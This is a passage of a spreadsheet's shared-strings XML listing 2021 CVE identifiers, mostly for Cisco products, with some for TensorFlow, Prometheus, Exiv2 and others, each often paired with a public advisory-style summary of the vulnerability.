    <t>CVE-2021-1185</t>
  </si>
  <si>
    <t>CVE-2021-1186</t>
  </si>
  <si>
    <t>CVE-2021-1187</t>
  </si>
  <si>
    <t>CVE-2021-1188</t>
  </si>
  <si>
    <t>CVE-2021-1189</t>
  </si>
  <si>
    <t>CVE-2021-1190</t>
  </si>
  <si>
    <t>CVE-2021-1191</t>
  </si>
  <si>
    <t>CVE-2021-1192</t>
  </si>
  <si>
    <t>CVE-2021-1193</t>
  </si>
  <si>
    <t>CVE-2021-1194</t>
  </si>
  <si>
    <t>CVE-2021-1195</t>
  </si>
  <si>
    <t>CVE-2021-1196</t>
  </si>
  <si>
    <t>CVE-2021-1197</t>
  </si>
  <si>
    <t>CVE-2021-1198</t>
  </si>
  <si>
    <t>CVE-2021-1199</t>
  </si>
  <si>
    <t>CVE-2021-1200</t>
  </si>
  <si>
    <t>CVE-2021-1201</t>
  </si>
  <si>
    <t>CVE-2021-1202</t>
  </si>
  <si>
    <t>CVE-2021-1203</t>
  </si>
  <si>
    <t>CVE-2021-1204</t>
  </si>
  <si>
    <t>CVE-2021-1205</t>
  </si>
  <si>
    <t>CVE-2021-1206</t>
  </si>
  <si>
    <t>CVE-2021-1207</t>
  </si>
  <si>
    <t>CVE-2021-1208</t>
  </si>
  <si>
    <t>CVE-2021-1209</t>
  </si>
  <si>
    <t>CVE-2021-1210</t>
  </si>
  <si>
    <t>CVE-2021-1211</t>
  </si>
  <si>
    <t>CVE-2021-1212</t>
  </si>
  <si>
    <t>CVE-2021-1213</t>
  </si>
  <si>
    <t>CVE-2021-1214</t>
  </si>
  <si>
    <t>CVE-2021-1215</t>
  </si>
  <si>
    <t>CVE-2021-1216</t>
  </si>
  <si>
    <t>CVE-2021-1217</t>
  </si>
  <si>
    <t>CVE-2021-1218</t>
  </si>
  <si>
    <t>A vulnerability in the web management interface of Cisco Smart Software Manager satellite could allow an authenticated, remote attacker to redirect a user to an undesired web page. The vulnerability is due to improper input validation of the URL parameters in an HTTP request that is sent to an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request that could cause the web application to redirect the request to a specified malicious URL. A successful exploit could allow the attacker to redirect a user to a malicious website.</t>
  </si>
  <si>
    <t>CVE-2021-1219</t>
  </si>
  <si>
    <t>A vulnerability in Cisco Smart Software Manager Satellite could allow an authenticated, local attacker to access sensitive information on an affected system. The vulnerability is due to insufficient protection of static credentials in the affected software. An attacker could exploit this vulnerability by gaining access to the static credential that is stored on the local device. A successful exploit could allow the attacker to view static credentials, which the attacker could use to carry out further attacks.</t>
  </si>
  <si>
    <t>CVE-2021-1220</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in the web UI of Cisco IOS XE Software could allow an authenticated, remote attacker with read-only privileges to cause the web UI software to become unresponsive and consume vty line instances, resulting in a denial of service (DoS) condition. These vulnerabilities are due to insufficient error handling in the web UI. An attacker could exploit these vulnerabilities by sending crafted HTTP packets to an affected device. A successful exploit could allow the attacker to cause the web UI software to become unresponsive and consume all available vty lines, preventing new session establishment and resulting in a DoS condition. Manual intervention would be required to regain web UI and vty session functionality. Note: These vulnerabilities do not affect the console connection.</t>
  </si>
  <si>
    <t>CVE-2021-1221</t>
  </si>
  <si>
    <t>A vulnerability in the user interface of Cisco Webex Meetings and Cisco Webex Meetings Server Software could allow an authenticated, remote attacker to inject a hyperlink into a meeting invitation email. The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by entering a URL into a field in the user interface. A successful exploit could allow the attacker to generate a Webex Meetings invitation email that contains a link to a destination of their choosing. Because this email is sent from a trusted source, the recipient may be more likely to click the link.</t>
  </si>
  <si>
    <t>CVE-2021-1222</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco Smart Software Manager Satellite could allow an authenticated, remote attacker to conduct SQL injection attacks on an affected system. The vulnerability exists because the web-based management interface improperly validates values within SQL queries. An attacker could exploit this vulnerability by authenticating to the application and sending malicious SQL queries to an affected system. A successful exploit could allow the attacker to modify values on or return values from the underlying database or the operating system.</t>
  </si>
  <si>
    <t>CVE-2021-1223</t>
  </si>
  <si>
    <t>Multiple Cisco products are affected by a vulnerability in the Snort detection engine that could allow an unauthenticated, remote attacker to bypass a configured file policy for HTTP. The vulnerability is due to incorrect handling of an HTTP range header. An attacker could exploit this vulnerability by sending crafted HTTP packets through an affected device. A successful exploit could allow the attacker to bypass configured file policy for HTTP packets and deliver a malicious payload.</t>
  </si>
  <si>
    <t>CVE-2021-1224</t>
  </si>
  <si>
    <t>Multiple Cisco products are affected by a vulnerability with TCP Fast Open (TFO) when used in conjunction with the Snort detection engine that could allow an unauthenticated, remote attacker to bypass a configured file policy for HTTP. The vulnerability is due to incorrect detection of the HTTP payload if it is contained at least partially within the TFO connection handshake. An attacker could exploit this vulnerability by sending crafted TFO packets with an HTTP payload through an affected device. A successful exploit could allow the attacker to bypass configured file policy for HTTP packets and deliver a malicious payload.</t>
  </si>
  <si>
    <t>CVE-2021-1225</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in the web-based management interface of Cisco SD-WAN vManage Software could allow an unauthenticated, remote attacker to conduct SQL injection attacks on an affected system. These vulnerabilities exist because the web-based management interface improperly validates values in SQL queries. An attacker could exploit these vulnerabilities by authenticating to the application and sending malicious SQL queries to an affected system. A successful exploit could allow the attacker to modify values on or return values from the underlying database or the operating system.</t>
  </si>
  <si>
    <t>CVE-2021-1226</t>
  </si>
  <si>
    <t>A vulnerability in the audit logging component of Cisco Unified Communications Manager, Cisco Unified Communications Manager Session Management Edition, Cisco Unified Communications Manager IM &amp;amp; Presence Service, Cisco Unity Connection, Cisco Emergency Responder, and Cisco Prime License Manager could allow an authenticated, remote attacker to view sensitive information in clear text on an affected system. The vulnerability is due to the storage of certain unencrypted credentials. An attacker could exploit this vulnerability by accessing the audit logs on an affected system and obtaining credentials that they may not normally have access to. A successful exploit could allow the attacker to use those credentials to discover and manage network devices.</t>
  </si>
  <si>
    <t>CVE-2021-1227</t>
  </si>
  <si>
    <t>A vulnerability in the NX-API feature of Cisco NX-OS Software could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack on an affected system. This vulnerability is due to insufficient CSRF protections for the NX-API on an affected device. An attacker could exploit this vulnerability by persuading a user of the NX-API to follow a malicious link. A successful exploit could allow the attacker to perform arbitrary actions with the privilege level of the affected user. The attacker could view and modify the device configuration. Note: The NX-API feature is disabled by default.</t>
  </si>
  <si>
    <t>CVE-2021-1228</t>
  </si>
  <si>
    <t>A vulnerability in the fabric infrastructure VLAN connection establishment of Cisco Nexus 9000 Series Fabric Switches in Application Centric Infrastructure (ACI) Mode could allow an unauthenticated, adjacent attacker to bypass security validations and connect an unauthorized server to the infrastructure VLAN. This vulnerability is due to insufficient security requirements during the Link Layer Discovery Protocol (LLDP) setup phase of the infrastructure VLAN. An attacker could exploit this vulnerability by sending a crafted LLDP packet on the adjacent subnet to an affected device. A successful exploit could allow the attacker to connect an unauthorized server to the infrastructure VLAN, which is highly privileged. With a connection to the infrastructure VLAN, the attacker can make unauthorized connections to Cisco Application Policy Infrastructure Controller (APIC) services or join other host endpoints.</t>
  </si>
  <si>
    <t>CVE-2021-1229</t>
  </si>
  <si>
    <t>A vulnerability in ICMP Version 6 (ICMPv6) processing in Cisco NX-OS Software could allow an unauthenticated, remote attacker to cause a slow system memory leak, which over time could lead to a denial of service (DoS) condition. This vulnerability is due to improper error handling when an IPv6-configured interface receives a specific type of ICMPv6 packet. An attacker could exploit this vulnerability by sending a sustained rate of crafted ICMPv6 packets to a local IPv6 address on a targeted device. A successful exploit could allow the attacker to cause a system memory leak in the ICMPv6 process on the device. As a result, the ICMPv6 process could run out of system memory and stop processing traffic. The device could then drop all ICMPv6 packets, causing traffic instability on the device. Restoring device functionality would require a device reboot.</t>
  </si>
  <si>
    <t>CVE-2021-1230</t>
  </si>
  <si>
    <t>A vulnerability with the Border Gateway Protocol (BGP) for Cisco Nexus 9000 Series Fabric Switches in Application Centric Infrastructure (ACI) mode could allow an unauthenticated, remote attacker to cause a routing process to crash, which could lead to a denial of service (DoS) condition. This vulnerability is due to an issue with the installation of routes upon receipt of a BGP update. An attacker could exploit this vulnerability by sending a crafted BGP update to an affected device. A successful exploit could allow the attacker to cause the routing process to crash, which could cause the device to reload. This vulnerability applies to both Internal BGP (IBGP) and External BGP (EBGP). Note: The Cisco implementation of BGP accepts incoming BGP traffic from explicitly configured peers only. To exploit this vulnerability, an attacker would need to send a specific BGP update message over an established TCP connection that appears to come from a trusted BGP peer.</t>
  </si>
  <si>
    <t>CVE-2021-1231</t>
  </si>
  <si>
    <t>A vulnerability in the Link Layer Discovery Protocol (LLDP) for Nexus 9000 Series Fabric Switches in Application Centric Infrastructure (ACI) mode could allow an unauthenticated, adjacent attacker to disable switching on a small form-factor pluggable (SFP) interface. This vulnerability is due to incomplete validation of the source of a received LLDP packet. An attacker could exploit this vulnerability by sending a crafted LLDP packet on an SFP interface to an affected device. A successful exploit could allow the attacker to disable switching on the SFP interface, which could disrupt network traffic.</t>
  </si>
  <si>
    <t>CVE-2021-1233</t>
  </si>
  <si>
    <t>A vulnerability in the CLI of Cisco SD-WAN Software could allow an authenticated, local attacker to access sensitive information on an affected device. The vulnerability is due to insufficient input validation of requests that are sent to the iperf tool. An attacker could exploit this vulnerability by sending a crafted request to the iperf tool, which is included in Cisco SD-WAN Software. A successful exploit could allow the attacker to obtain any file from the filesystem of an affected device.</t>
  </si>
  <si>
    <t>CVE-2021-1235</t>
  </si>
  <si>
    <t>A vulnerability in the CLI of Cisco SD-WAN vManage Software could allow an authenticated, local attacker to read sensitive database files on an affected system. The vulnerability is due to insufficient user authorization. An attacker could exploit this vulnerability by accessing the vshell of an affected system. A successful exploit could allow the attacker to read database files from the filesystem of the underlying operating system.</t>
  </si>
  <si>
    <t>497</t>
  </si>
  <si>
    <t>CVE-2021-1236</t>
  </si>
  <si>
    <t>Multiple Cisco products are affected by a vulnerability in the Snort application detection engine that could allow an unauthenticated, remote attacker to bypass the configured policies on an affected system. The vulnerability is due to a flaw in the detection algorithm. An attacker could exploit this vulnerability by sending crafted packets that would flow through an affected system. A successful exploit could allow the attacker to bypass the configured policies and deliver a malicious payload to the protected network.</t>
  </si>
  <si>
    <t>CVE-2021-1237</t>
  </si>
  <si>
    <t>A vulnerability in the Network Access Manager and Web Security Agent components of Cisco AnyConnect Secure Mobility Client for Windows could allow an authenticated, local attacker to perform a DLL injection attack. To exploit this vulnerability, the attacker would need to have valid credentials on the Windows system. The vulnerability is due to insufficient validation of resources that are loaded by the application at run time. An attacker could exploit this vulnerability by inserting a configuration file in a specific path in the system which, in turn, causes a malicious DLL file to be loaded when the application starts. A successful exploit could allow the attacker to execute arbitrary code on the affected machine with SYSTEM privileges.</t>
  </si>
  <si>
    <t>CVE-2021-1238</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in the web-based management interface of Cisco Firepower Management Center (FMC) could allow an authenticated, remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the interface of an affected system. The vulnerabilities exist because the web-based management interface does not properly validate user-supplied input. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.</t>
  </si>
  <si>
    <t>CVE-2021-1239</t>
  </si>
  <si>
    <t>CVE-2021-1240</t>
  </si>
  <si>
    <t>A vulnerability in the loading process of specific DLLs in Cisco Proximity Desktop for Windows could allow an authenticated, local attacker to load a malicious library. To exploit this vulnerability, the attacker must have valid credentials on the Windows system. This vulnerability is due to incorrect handling of directory paths at run time. An attacker could exploit this vulnerability by placing a malicious DLL file in a specific location on the targeted system. This file will execute when the vulnerable application launches. A successful exploit could allow the attacker to execute arbitrary code on the targeted system with the privileges of another user&amp;rsquo;s account.</t>
  </si>
  <si>
    <t>CVE-2021-1241</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in Cisco SD-WAN products could allow an unauthenticated, remote attacker to execute denial of service (DoS) attacks against an affected device. For more information about these vulnerabilities, see the Details section of this advisory.</t>
  </si>
  <si>
    <t>CVE-2021-1242</t>
  </si>
  <si>
    <t>A vulnerability in Cisco Webex Teams could allow an unauthenticated, remote attacker to manipulate file names within the messaging interface. The vulnerability exists because the affected software mishandles character rendering. An attacker could exploit this vulnerability by sharing a file within the application interface. A successful exploit could allow the attacker to modify how the shared file name displays within the interface, which could allow the attacker to conduct phishing or spoofing attacks.</t>
  </si>
  <si>
    <t>CVE-2021-1243</t>
  </si>
  <si>
    <t>A vulnerability in the Local Packet Transport Services (LPTS) programming of the SNMP with the management plane protection feature of Cisco IOS XR Software could allow an unauthenticated, remote attacker to allow connections despite the management plane protection that is configured to deny access to the SNMP server of an affected device. This vulnerability is due to incorrect LPTS programming when using SNMP with management plane protection. An attacker could exploit this vulnerability by connecting to an affected device using SNMP. A successful exploit could allow the attacker to connect to the device on the configured SNMP ports. Valid credentials are required to execute any of the SNMP requests.</t>
  </si>
  <si>
    <t>CVE-2021-1244</t>
  </si>
  <si>
    <t>CVE-2021-1245</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in the web-based management interface of Cisco Finesse could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack and obtain potentially confidential information by leveraging a flaw in the authentication mechanism. For more information about these vulnerabilities, see the Details section of this advisory.</t>
  </si>
  <si>
    <t>CVE-2021-1246</t>
  </si>
  <si>
    <t>CVE-2021-1247</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in certain REST API endpoints of Cisco Data Center Network Manager (DCNM) could allow an authenticated, remote attacker to execute arbitrary SQL commands on an affected device. For more information about these vulnerabilities, see the Details section of this advisory.</t>
  </si>
  <si>
    <t>CVE-2021-1248</t>
  </si>
  <si>
    <t>CVE-2021-1249</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in the web-based management interface of Cisco Data Center Network Manager (DCNM) could allow a remote attacker with network-operator privileges to conduct a cross-site scripting (XSS) attack or a reflected file download (RFD) attack against a user of the interface. For more information about these vulnerabilities, see the Details section of this advisory.</t>
  </si>
  <si>
    <t>CVE-2021-1250</t>
  </si>
  <si>
    <t>CVE-2021-1251</t>
  </si>
  <si>
    <t>Multiple vulnerabilities exist in the Link Layer Discovery Protocol (LLDP) implementation for Cisco Small Business RV Series Routers. An unauthenticated, adjacent attacker could execute arbitrary code or cause an affected router to leak system memory or reload. A memory leak or device reload would cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. Note: LLDP is a Layer 2 protocol. To exploit these vulnerabilities, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent).</t>
  </si>
  <si>
    <t>CVE-2021-1252</t>
  </si>
  <si>
    <t>A vulnerability in the Excel XLM macro parsing module in Clam AntiVirus (ClamAV) Software versions 0.103.0 and 0.103.1 could allow an unauthenticated, remote attacker to cause a denial of service condition on an affected device. The vulnerability is due to improper error handling that may result in an infinite loop. An attacker could exploit this vulnerability by sending a crafted Excel file to an affected device. An exploit could allow the attacker to cause the ClamAV scanning process hang, resulting in a denial of service condition.</t>
  </si>
  <si>
    <t>CVE-2021-1253</t>
  </si>
  <si>
    <t>CVE-2021-1254</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in the web-based management interface of Cisco Finesse could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. These vulnerabilities are due to insufficient validation of user-supplied input by the web-based management interface of the affected software. An attacker could exploit these vulnerabilities by injecting malicious code into the web-based management interface and persuading a user to click a malicious link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. An attacker needs valid administrator credentials to inject the malicious script code.</t>
  </si>
  <si>
    <t>CVE-2021-1255</t>
  </si>
  <si>
    <t>CVE-2021-1256</t>
  </si>
  <si>
    <t>A vulnerability in the CLI of Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, local attacker to overwrite files on the file system of an affected device by using directory traversal techniques. A successful exploit could cause system instability if important system files are overwritten. This vulnerability is due to insufficient validation of user input for the file path in a specific CLI command. An attacker could exploit this vulnerability by logging in to a targeted device and issuing a specific CLI command with crafted user input. A successful exploit could allow the attacker to overwrite arbitrary files on the file system of the affected device. The attacker would need valid user credentials on the device.</t>
  </si>
  <si>
    <t>CVE-2021-1257</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco DNA Center Software could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack to manipulate an authenticated user into executing malicious actions without their awareness or consent. The vulnerability is due to insufficient CSRF protections for the web-based management interface of an affected device. An attacker could exploit this vulnerability by persuading a web-based management user to follow a specially crafted link. A successful exploit could allow the attacker to perform arbitrary actions on the device with the privileges of the authenticated user. These actions include modifying the device configuration, disconnecting the user's session, and executing Command Runner commands.</t>
  </si>
  <si>
    <t>CVE-2021-1258</t>
  </si>
  <si>
    <t>A vulnerability in the upgrade component of Cisco AnyConnect Secure Mobility Client could allow an authenticated, local attacker with low privileges to read arbitrary files on the underlying operating system (OS) of an affected device. The vulnerability is due to insufficient file permission restrictions. An attacker could exploit this vulnerability by sending a crafted command from the local CLI to the application. A successful exploit could allow the attacker to read arbitrary files on the underlying OS of the affected device. The attacker would need to have valid user credentials to exploit this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-1259</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco SD-WAN vManage Software could allow an authenticated, remote attacker to conduct path traversal attacks and obtain write access to sensitive files on an affected system. The vulnerability is due to insufficient validation of HTTP requests. An attacker could exploit this vulnerability by sending a crafted HTTP request that contains directory traversal character sequences to an affected system. A successful exploit could allow the attacker to write arbitrary files on the affected system.</t>
  </si>
  <si>
    <t>CVE-2021-1260</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in Cisco SD-WAN products could allow an authenticated attacker to perform command injection attacks against an affected device, which could allow the attacker to take certain actions with root privileges on the device. For more information about these vulnerabilities, see the Details section of this advisory.</t>
  </si>
  <si>
    <t>CVE-2021-1261</t>
  </si>
  <si>
    <t>CVE-2021-1262</t>
  </si>
  <si>
    <t>CVE-2021-1263</t>
  </si>
  <si>
    <t>CVE-2021-1264</t>
  </si>
  <si>
    <t>A vulnerability in the Command Runner tool of Cisco DNA Center could allow an authenticated, remote attacker to perform a command injection attack. The vulnerability is due to insufficient input validation by the Command Runner tool. An attacker could exploit this vulnerability by providing crafted input during command execution or via a crafted command runner API call. A successful exploit could allow the attacker to execute arbitrary CLI commands on devices managed by Cisco DNA Center.</t>
  </si>
  <si>
    <t>CVE-2021-1265</t>
  </si>
  <si>
    <t>A vulnerability in the configuration archive functionality of Cisco DNA Center could allow any privilege-level authenticated, remote attacker to obtain the full unmasked running configuration of managed devices. The vulnerability is due to the configuration archives files being stored in clear text, which can be retrieved by various API calls. An attacker could exploit this vulnerability by authenticating to the device and executing a series of API calls. A successful exploit could allow the attacker to retrieve the full unmasked running configurations of managed devices.</t>
  </si>
  <si>
    <t>CVE-2021-1266</t>
  </si>
  <si>
    <t>A vulnerability in the REST API of Cisco Managed Services Accelerator (MSX) could allow an authenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to the way that the affected software logs certain API requests. An attacker could exploit this vulnerability by sending a flood of crafted API requests to an affected device. A successful exploit could allow the attacker to cause a DoS condition on the affected device.</t>
  </si>
  <si>
    <t>CVE-2021-1267</t>
  </si>
  <si>
    <t>A vulnerability in the dashboard widget of Cisco Firepower Management Center (FMC) Software could allow an authenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to improper restrictions on XML entities. An attacker could exploit this vulnerability by crafting an XML-based widget on an affected server. A successful exploit could cause increased memory and CPU utilization, which could result in a DoS condition.</t>
  </si>
  <si>
    <t>CVE-2021-1268</t>
  </si>
  <si>
    <t>A vulnerability in the IPv6 protocol handling of the management interfaces of Cisco IOS XR Software could allow an unauthenticated, adjacent attacker to cause an IPv6 flood on the management interface network of an affected device. The vulnerability exists because the software incorrectly forwards IPv6 packets that have an IPv6 node-local multicast group address destination and are received on the management interfaces. An attacker could exploit this vulnerability by connecting to the same network as the management interfaces and injecting IPv6 packets that have an IPv6 node-local multicast group address destination. A successful exploit could allow the attacker to cause an IPv6 flood on the corresponding network. Depending on the number of Cisco IOS XR Software nodes on that network segment, exploitation could cause excessive network traffic, resulting in network degradation or a denial of service (DoS) condition.</t>
  </si>
  <si>
    <t>1076</t>
  </si>
  <si>
    <t>CVE-2021-1269</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in the web-based management interface of Cisco Data Center Network Manager (DCNM) could allow an authenticated, remote attacker to view, modify, and delete data without proper authorization. For more information about these vulnerabilities, see the Details section of this advisory.</t>
  </si>
  <si>
    <t>CVE-2021-1270</t>
  </si>
  <si>
    <t>CVE-2021-1271</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco AsyncOS for Cisco Web Security Appliance (WSA) could allow an authenticated, remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the interface of an affected device. The vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by inserting malicious data into a specific data field in an affected interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface.</t>
  </si>
  <si>
    <t>CVE-2021-1272</t>
  </si>
  <si>
    <t>A vulnerability in the session validation feature of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to bypass access controls and conduct a server-side request forgery (SSRF) attack on a targeted system. This vulnerability is due to insufficient validation of parameters in a specific HTTP request by an attacker. An attacker could exploit this vulnerability by sending a crafted HTTP request to an authenticated user of the DCNM web application. A successful exploit could allow the attacker to bypass access controls and gain unauthorized access to the Device Manager application, which provides access to network devices managed by the system.</t>
  </si>
  <si>
    <t>CVE-2021-1273</t>
  </si>
  <si>
    <t>CVE-2021-1274</t>
  </si>
  <si>
    <t>CVE-2021-1275</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in Cisco SD-WAN vManage Software could allow an unauthenticated, remote attacker to execute arbitrary code or gain access to sensitive information, or allow an authenticated, local attacker to gain escalated privileges or gain unauthorized access to the application. For more information about these vulnerabilities, see the Details section of this advisory.</t>
  </si>
  <si>
    <t>CVE-2021-1276</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in Cisco Data Center Network Manager (DCNM) could allow an attacker to spoof a trusted host or construct a man-in-the-middle attack to extract sensitive information or alter certain API requests. These vulnerabilities are due to insufficient certificate validation when establishing HTTPS requests with the affected device. For more information about these vulnerabilities, see the Details section of this advisory.</t>
  </si>
  <si>
    <t>CVE-2021-1277</t>
  </si>
  <si>
    <t>CVE-2021-1278</t>
  </si>
  <si>
    <t>CVE-2021-1279</t>
  </si>
  <si>
    <t>CVE-2021-1280</t>
  </si>
  <si>
    <t>A vulnerability in the loading mechanism of specific DLLs of Cisco Advanced Malware Protection (AMP) for Endpoints for Windows and Immunet for Windows could allow an authenticated, local attacker to perform a DLL hijacking attack. To exploit this vulnerability, the attacker would need valid credentials on the Windows system. This vulnerability is due to incorrect handling of directory search paths at run time. An attacker could exploit this vulnerability by placing a malicious DLL file on the targeted system. This file will execute when the vulnerable application launches. A successful exploit could allow the attacker to execute arbitrary code on the targeted system with SYSTEM privileges.</t>
  </si>
  <si>
    <t>CVE-2021-1281</t>
  </si>
  <si>
    <t>A vulnerability in CLI management in Cisco IOS XE SD-WAN Software could allow an authenticated, local attacker to access the underlying operating system as the root user. This vulnerability is due to the way the software handles concurrent CLI sessions. An attacker could exploit this vulnerability by authenticating to the device as an administrative user and executing a sequence of commands. A successful exploit could allow the attacker to obtain access to the underlying operating system as the root user.</t>
  </si>
  <si>
    <t>CVE-2021-1282</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in Cisco Unified Communications Manager IM &amp;amp; Presence Service (Unified CM IM&amp;amp;P) could allow an attacker to conduct path traversal attacks and SQL injection attacks on an affected system. One of the SQL injection vulnerabilities that affects Unified CM IM&amp;amp;P also affects Cisco Unified Communications Manager (Unified CM) and Cisco Unified Communications Manager Session Management Edition (Unified CM SME) and could allow an attacker to conduct SQL injection attacks on an affected system. For more information about these vulnerabilities, see the Details section of this advisory.</t>
  </si>
  <si>
    <t>CVE-2021-1283</t>
  </si>
  <si>
    <t>A vulnerability in the logging subsystem of Cisco Data Center Network Manager (DCNM) could allow an authenticated, local attacker to view sensitive information in a system log file that should be restricted. The vulnerability exists because sensitive information is not properly masked before it is written to system log files. An attacker could exploit this vulnerability by authenticating to an affected device and inspecting a specific system log file. A successful exploit could allow the attacker to view sensitive information in the system log file. To exploit this vulnerability, the attacker would need to have valid user credentials.</t>
  </si>
  <si>
    <t>789</t>
  </si>
  <si>
    <t>CVE-2021-1284</t>
  </si>
  <si>
    <t>A vulnerability in the web-based messaging service interface of Cisco SD-WAN vManage Software could allow an unauthenticated, adjacent attacker to bypass authentication and authorization and modify the configuration of an affected system. To exploit this vulnerability, the attacker must be able to access an associated Cisco SD-WAN vEdge device. This vulnerability is due to insufficient authorization checks. An attacker could exploit this vulnerability by sending crafted HTTP requests to the web-based messaging service interface of an affected system. A successful exploit could allow the attacker to gain unauthenticated read and write access to the affected vManage system. With this access, the attacker could access information about the affected vManage system, modify the configuration of the system, or make configuration changes to devices that are managed by the system.</t>
  </si>
  <si>
    <t>CVE-2021-1286</t>
  </si>
  <si>
    <t>CVE-2021-1287</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco RV132W ADSL2+ Wireless-N VPN Routers and Cisco RV134W VDSL2 Wireless-AC VPN Routers could allow an authenticated, remote attacker to execute arbitrary code on an affected device or cause the device to restart unexpectedly. The vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition on the affected device.</t>
  </si>
  <si>
    <t>CVE-2021-1288</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in the ingress packet processing function of Cisco IOS XR Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory.</t>
  </si>
  <si>
    <t>CVE-2021-1289</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV160, RV160W, RV260, RV260P, and RV260W VPN Routers could allow an unauthenticated, remote attacker to execute arbitrary code as the root user on an affected device. These vulnerabilities exist because HTTP requests are not properly validated. An attacker could exploit these vulnerabilities by sending a crafted HTTP request to the web-based management interface of an affected device. A successful exploit could allow the attacker to remotely execute arbitrary code on the device.</t>
  </si>
  <si>
    <t>472</t>
  </si>
  <si>
    <t>CVE-2021-1290</t>
  </si>
  <si>
    <t>CVE-2021-1291</t>
  </si>
  <si>
    <t>CVE-2021-1292</t>
  </si>
  <si>
    <t>CVE-2021-1293</t>
  </si>
  <si>
    <t>CVE-2021-1294</t>
  </si>
  <si>
    <t>CVE-2021-1295</t>
  </si>
  <si>
    <t>CVE-2021-29618</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. Passing a complex argument to `tf.transpose` at the same time as passing `conjugate=True` argument results in a crash. The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-29619</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. Passing invalid arguments (e.g., discovered via fuzzing) to `tf.raw_ops.SparseCountSparseOutput` results in segfault. The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-29620</t>
  </si>
  <si>
    <t>Report portal is an open source reporting and analysis framework. Starting from version 3.1.0 of the service-api XML parsing was introduced. Unfortunately the XML parser was not configured properly to prevent XML external entity (XXE) attacks. This allows a user to import a specifically-crafted XML file which imports external Document Type Definition (DTD) file with external entities for extraction of secrets from Report Portal service-api module or server-side request forgery. This will be resolved in the 5.4.0 release.</t>
  </si>
  <si>
    <t>CVE-2021-29621</t>
  </si>
  <si>
    <t>Flask-AppBuilder is a development framework, built on top of Flask. User enumeration in database authentication in Flask-AppBuilder &lt;= 3.2.3. Allows for a non authenticated user to enumerate existing accounts by timing the response time from the server when you are logging in. Upgrade to version 3.3.0 or higher to resolve.</t>
  </si>
  <si>
    <t>CVE-2021-29622</t>
  </si>
  <si>
    <t>Prometheus is an open-source monitoring system and time series database. In 2.23.0, Prometheus changed its default UI to the New ui. To ensure a seamless transition, the URL's prefixed by /new redirect to /. Due to a bug in the code, it is possible for an attacker to craft an URL that can redirect to any other URL, in the /new endpoint. If a user visits a prometheus server with a specially crafted address, they can be redirected to an arbitrary URL. The issue was patched in the 2.26.1 and 2.27.1 releases. In 2.28.0, the /new endpoint will be removed completely. The workaround is to disable access to /new via a reverse proxy in front of Prometheus.</t>
  </si>
  <si>
    <t>CVE-2021-29623</t>
  </si>
  <si>
    <t>Exiv2 is a C++ library and a command-line utility to read, write, delete and modify Exif, IPTC, XMP and ICC image metadata. A read of uninitialized memory was found in Exiv2 versions v0.27.3 and earlier. Exiv2 is a command-line utility and C++ library for reading, writing, deleting, and modifying the metadata of image files. The read of uninitialized memory is triggered when Exiv2 is used to read the metadata of a crafted image file. An attacker could potentially exploit the vulnerability to leak a few bytes of stack memory, if they can trick the victim into running Exiv2 on a crafted image file. The bug is fixed in version v0.27.4.</t>
  </si>
  <si>
    <t>CVE-2021-29624</t>
  </si>
  <si>
